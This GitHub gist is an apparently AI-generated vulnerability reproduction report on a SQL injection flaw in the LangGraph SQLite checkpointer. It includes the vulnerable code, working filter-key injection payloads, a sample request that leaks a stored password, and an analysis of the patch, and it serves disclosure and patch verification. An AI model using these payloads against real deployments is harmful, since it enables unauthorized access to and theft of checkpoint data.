Skip to content

Instantly share code, notes, and snippets.

@N3mes1s
Created December 10, 2025 21:05
Show Gist options
  • Select an option

  • Save N3mes1s/ff9ef7447f1da40797735eb5ec1bd726 to your computer and use it in GitHub Desktop.

Select an option

Save N3mes1s/ff9ef7447f1da40797735eb5ec1bd726 to your computer and use it in GitHub Desktop.
SQL Injection in LangGraph SQLite Checkpointer - CVE-2025-67644

SQL Injection in LangGraph SQLite Checkpointer - CVE-2025-67644

Report Date: December 10, 2025 Advisory ID: GHSA-9rwj-6rc7-p77c Reproduction Status: ✅ CONFIRMED


Executive Summary

A critical SQL injection vulnerability was identified and successfully reproduced in the langgraph-checkpoint-sqlite package. The vulnerability allows attackers to bypass access controls and exfiltrate sensitive data from LangGraph checkpoint storage by injecting malicious SQL through unvalidated metadata filter keys.

Key Finding: Exploitation confirmed - private checkpoint data including passwords was successfully leaked via SQL injection payloads.


Vulnerability Details

Attribute Value
Package langgraph-checkpoint-sqlite
Ecosystem PyPI (Python)
Vulnerable Versions < 3.0.1
Patched Version 3.0.1
Severity HIGH
CVSS Score 7.3
CWE CWE-89: SQL Injection
Fix Commit 297242913f8ad2143ee3e2f72e67db0911d48e2a

Technical Analysis

Root Cause

The vulnerability exists in the _metadata_predicate() function within langgraph/checkpoint/sqlite/utils.py. The function constructs SQL queries by directly interpolating metadata filter keys into f-strings without validation:

# VULNERABLE CODE (< 3.0.1)
def _metadata_predicate(metadata_filter: dict) -> tuple[Sequence, Sequence[Any]]:
    predicates = []
    param_values = []

    for query_key, query_value in metadata_filter.items():
        operator, param_value = _where_value(query_value)
        predicates.append(
            f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"
            #                                          ^^^^^^^^^^
            #                          UNSANITIZED USER INPUT INTERPOLATED
        )
        param_values.append(param_value)

    return (predicates, param_values)

While filter values are properly parameterized, filter keys bypass security measures entirely.

Attack Vector

An attacker controlling metadata filter keys can break out of the JSON path literal and inject arbitrary SQL:

Malicious Key: x') = ? OR 1=1 --

Generated SQL (simplified):

SELECT * FROM checkpoints
WHERE json_extract(CAST(metadata AS TEXT), '$.x') = ? OR 1=1 -- ') = ?

The injection:

  1. Closes the JSON path string with ')
  2. Satisfies the existing parameter placeholder with = ?
  3. Adds OR 1=1 to create a tautology (always true)
  4. Comments out remaining SQL with --

Exploitation Requirements

  • Application must expose checkpoint query functionality
  • Attacker must control metadata filter keys (not just values)
  • Target must use SqliteSaver checkpointer

Reproduction Results

Environment

  • Platform: Ubuntu 22.04 (Lima VM)
  • Python: 3.10
  • Test Server: FastAPI with uvicorn

Tested Payloads

# Payload Purpose
1 x') = ? OR 1=1 -- Boolean tautology bypass
2 x') = ? UNION SELECT 1 -- Union-based injection
3 x') = ? OR json_extract(CAST(metadata AS TEXT), '$.access') IS NOT NULL -- Nested function injection

Results Matrix

Payload Vulnerable (3.0.0) Patched (3.0.1)
#1 - OR 1=1 EXPLOITED - Both checkpoints returned, password leaked ❌ BLOCKED - HTTP 500, ValueError
#2 - UNION ⚠️ SQL Error (proves injection control) ❌ BLOCKED - ValueError
#3 - Nested EXPLOITED - Both checkpoints returned ❌ BLOCKED - HTTP 500, ValueError

Evidence of Exploitation

Vulnerable Version (3.0.0):

// Request
POST /api/history
{"filter_field": "x') = ? OR 1=1 -- ", "filter_value": "dummy"}

// Response - HTTP 200 (LEAKED DATA)
[
  {"access": "private", "data": "secret information", "password": "super-secret"},
  {"access": "public", "data": "public information"}
]

Patched Version (3.0.1):

// Same request returns HTTP 500
ValueError: Invalid filter key: 'x') = ? OR 1=1 -- '.
Filter keys must contain only alphanumeric characters, underscores, dots, and hyphens.

Patch Analysis

Fix Implementation

The patch introduces key validation via regex:

# PATCHED CODE (>= 3.0.1)
import re

_FILTER_PATTERN = re.compile(r"^[a-zA-Z0-9_.-]+$")

def _validate_filter_key(key: str) -> None:
    if not _FILTER_PATTERN.match(key):
        raise ValueError(
            f"Invalid filter key: '{key}'. Filter keys must contain only "
            "alphanumeric characters, underscores, dots, and hyphens."
        )

Additional Hardening

  1. Key Validation: All filter keys validated against [a-zA-Z0-9_.-]+ before use
  2. Parameterized LIMIT: limit parameter now passed as bound parameter instead of interpolated

Patch Effectiveness

Verdict: ✅ EFFECTIVE

All tested bypass attempts are rejected at the validation layer before any SQL is constructed. The regex pattern prevents injection of:

  • Quote characters (', ")
  • SQL operators (=, OR, AND)
  • Comments (--, /*)
  • Parentheses ((, ))

Impact Assessment

Affected Scenarios

Scenario Risk Level
Custom server deployments using SqliteSaver HIGH
Applications forwarding user input to checkpoint filters CRITICAL
Internal tools with trusted users LOW
LangSmith hosted deployments NOT AFFECTED (custom checkpointers not supported)

Potential Impact

  • Confidentiality: Unauthorized access to all checkpoint data
  • Integrity: Potential for data modification via advanced injection
  • Availability: DoS possible via malformed queries

Recommendations

Immediate Actions

  1. Upgrade immediately to langgraph-checkpoint-sqlite >= 3.0.1

    pip install --upgrade "langgraph-checkpoint-sqlite>=3.0.1"
  2. Audit applications for any code paths forwarding user input to checkpoint filters

  3. Review logs for suspicious filter key patterns (containing ', --, OR, etc.)

Long-term Mitigations

  1. Input Validation: Enforce allowlist validation at API boundaries, not just the library layer

  2. Defense in Depth: Add parameterized queries for ALL user-controlled inputs

  3. Security Testing: Add fuzzing tests for filter keys with SQL metacharacters

  4. Error Handling: Return 400 Bad Request instead of 500 for invalid filter keys


Artifacts

Generated Files

File Description
repro/reproduction_steps.sh Automated bash script for full PoC
repro/vuln_server.py Vulnerable FastAPI server demonstrating the issue
repro/rca_report.md Root cause analysis report
repro/patch_analysis.md Detailed patch effectiveness analysis
logs/langgraph_sqlite_*/ Execution logs with evidence

Reproduction Command

cd repro && ./reproduction_steps.sh

The script:

  1. Creates isolated virtualenv
  2. Installs vulnerable version 3.0.0
  3. Runs exploitation tests
  4. Upgrades to patched version 3.0.1
  5. Verifies fix blocks all payloads

Timeline

Date Event
2025-12-10 GHSA published
2025-12-10 Pruva reproduction initiated
2025-12-10 Vulnerability confirmed exploitable
2025-12-10 Patch verified effective
2025-12-10 Security report generated

References


Report Metadata

Field Value
Generated By Pruva Security Automation
Reproduction Time ~66 minutes
Agent Turns 102
Lima VM pruva-ghsa-9rwj-6rc7-p77c-langgraph-checkpoint-*
Session ID GHSA-9rwj-6rc7-p77c-LANGGRAPH-CHECKPOINT-SQLITE-SQL-INJECTION-4820c8ab

This report was automatically generated by Pruva's AI-powered vulnerability reproduction platform.

@cvlabsio
Copy link

Is pruva available or any details on how you come up with the workflows?

@N3mes1s
Copy link
Author

N3mes1s commented Dec 11, 2025

@cvlabsio still working on making it available to the broader public. But in few words it is a multi agentic system that ingest a cve/issue and try to reproduce it with a sandbox.

@cvlabsio
Copy link

Thanks and understood. Will wait for the details when fully released.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment